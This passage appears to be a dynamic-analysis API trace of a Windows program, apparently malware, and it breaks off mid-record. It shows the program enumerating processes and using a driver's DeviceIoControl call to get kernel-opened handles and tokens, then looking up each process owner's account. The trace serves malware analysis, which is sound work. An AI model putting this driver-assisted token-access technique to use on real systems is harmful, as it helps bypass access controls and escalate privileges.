[0267.661] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.661] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0007a74d840, HandleInformation=0x0) returned 0x0 [0267.661] ObOpenObjectByPointer (in: Object=0xffffe0007a74d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.661] ObfDereferenceObject (Object=0xffffe0007a74d840) returned 0x2fff8 [0267.661] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe0006a4358c0 | out: TokenHandle=0xffffe0006a4358c0*=0x1a8) returned 0x0 [0267.661] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.661] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.661] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.664] CloseHandle (hObject=0x1a8) returned 1 [0267.664] CloseHandle (hObject=0x180) returned 1 [0267.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x504) returned 0x180 [0267.664] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.664] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069fe1080, HandleInformation=0x0) returned 0x0 [0267.664] ObOpenObjectByPointer (in: Object=0xffffe00069fe1080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.664] ObfDereferenceObject (Object=0xffffe00069fe1080) returned 0x2fff8 [0267.664] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069028ec0 | out: TokenHandle=0xffffe00069028ec0*=0x1a8) returned 0x0 [0267.664] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.664] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.664] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.680] CloseHandle (hObject=0x1a8) returned 1 [0267.680] CloseHandle (hObject=0x180) returned 1 [0267.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8cc) returned 0x180 [0267.680] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.680] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069902340, HandleInformation=0x0) returned 0x0 [0267.680] ObOpenObjectByPointer (in: Object=0xffffe00069902340, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.680] ObfDereferenceObject (Object=0xffffe00069902340) returned 0x2fff8 [0267.680] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069dd5b80 | out: TokenHandle=0xffffe00069dd5b80*=0x1a8) returned 0x0 [0267.680] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.680] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.680] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.681] CloseHandle (hObject=0x1a8) returned 1 [0267.681] CloseHandle (hObject=0x180) returned 1 [0267.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x52c) returned 0x180 [0267.682] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.682] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069fcb080, HandleInformation=0x0) returned 0x0 [0267.682] ObOpenObjectByPointer (in: Object=0xffffe00069fcb080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.682] ObfDereferenceObject (Object=0xffffe00069fcb080) returned 0x2fff8 [0267.682] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069dd5b80 | out: TokenHandle=0xffffe00069dd5b80*=0x1a8) returned 0x0 [0267.682] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.682] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.682] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.682] CloseHandle (hObject=0x1a8) returned 1 [0267.682] CloseHandle (hObject=0x180) returned 1 [0267.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x180 [0267.683] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.683] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000691dd840, HandleInformation=0x0) returned 0x0 [0267.683] ObOpenObjectByPointer (in: Object=0xffffe000691dd840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.683] ObfDereferenceObject (Object=0xffffe000691dd840) returned 0x2ffe9 [0267.683] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069dd5b80 | out: TokenHandle=0xffffe00069dd5b80*=0x1a8) returned 0x0 [0267.683] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.684] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.684] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.684] CloseHandle (hObject=0x1a8) returned 1 [0267.684] CloseHandle (hObject=0x180) returned 1 [0267.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x164) returned 0x0 [0267.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbd0) returned 0x180 [0267.685] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.685] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006984f080, HandleInformation=0x0) returned 0x0 [0267.685] ObOpenObjectByPointer (in: Object=0xffffe0006984f080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.685] ObfDereferenceObject (Object=0xffffe0006984f080) returned 0x37fc7 [0267.685] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069dd5b80 | out: TokenHandle=0xffffe00069dd5b80*=0x1a8) returned 0x0 [0267.685] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.685] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.685] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.686] CloseHandle (hObject=0x1a8) returned 1 [0267.686] CloseHandle (hObject=0x180) returned 1 [0267.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0x180 [0267.687] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.687] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a2fb080, HandleInformation=0x0) returned 0x0 [0267.687] ObOpenObjectByPointer (in: Object=0xffffe0006a2fb080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f40) returned 0x0 [0267.687] ObfDereferenceObject (Object=0xffffe0006a2fb080) returned 0x2801c [0267.687] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f40, DesiredAccess=0x8, TokenHandle=0xffffe00069dd5b80 | out: TokenHandle=0xffffe00069dd5b80*=0x1a8) returned 0x0 [0267.687] ZwClose (Handle=0xffffffff80000f40) returned 0x0 [0267.687] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.687] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.814] CloseHandle (hObject=0x1a8) returned 1 [0267.814] CloseHandle (hObject=0x180) returned 1 [0267.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb68) returned 0x180 [0267.814] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.814] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00068a47080, HandleInformation=0x0) returned 0x0 [0267.814] ObOpenObjectByPointer (in: Object=0xffffe00068a47080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.814] ObfDereferenceObject (Object=0xffffe00068a47080) returned 0x8004 [0267.814] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.815] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.815] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.815] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.815] CloseHandle (hObject=0x1a8) returned 1 [0267.815] CloseHandle (hObject=0x180) returned 1 [0267.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0267.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x180 [0267.815] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.815] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00068a50840, HandleInformation=0x0) returned 0x0 [0267.815] ObOpenObjectByPointer (in: Object=0xffffe00068a50840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.815] ObfDereferenceObject (Object=0xffffe00068a50840) returned 0x38008 [0267.815] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.816] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.816] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.816] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.816] CloseHandle (hObject=0x1a8) returned 1 [0267.816] CloseHandle (hObject=0x180) returned 1 [0267.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf74) returned 0x0 [0267.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfa4) returned 0x180 [0267.817] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.817] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069e17400, HandleInformation=0x0) returned 0x0 [0267.817] ObOpenObjectByPointer (in: Object=0xffffe00069e17400, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.817] ObfDereferenceObject (Object=0xffffe00069e17400) returned 0x27fef [0267.817] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.817] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.817] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.817] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.818] CloseHandle (hObject=0x1a8) returned 1 [0267.818] CloseHandle (hObject=0x180) returned 1 [0267.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x180 [0267.818] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.818] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a124080, HandleInformation=0x0) returned 0x0 [0267.818] ObOpenObjectByPointer (in: Object=0xffffe0006a124080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.819] ObfDereferenceObject (Object=0xffffe0006a124080) returned 0x2801e [0267.819] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.819] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.819] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.819] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.819] CloseHandle (hObject=0x1a8) returned 1 [0267.820] CloseHandle (hObject=0x180) returned 1 [0267.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe2c) returned 0x180 [0267.820] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.820] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006988c080, HandleInformation=0x0) returned 0x0 [0267.820] ObOpenObjectByPointer (in: Object=0xffffe0006988c080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.820] ObfDereferenceObject (Object=0xffffe0006988c080) returned 0x40010 [0267.820] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.820] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.820] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.820] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.821] CloseHandle (hObject=0x1a8) returned 1 [0267.821] CloseHandle (hObject=0x180) returned 1 [0267.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0x180 [0267.821] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.821] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a6f13c0, HandleInformation=0x0) returned 0x0 [0267.821] ObOpenObjectByPointer (in: Object=0xffffe0006a6f13c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.821] ObfDereferenceObject (Object=0xffffe0006a6f13c0) returned 0x27fdf [0267.821] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.821] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.821] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.821] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: 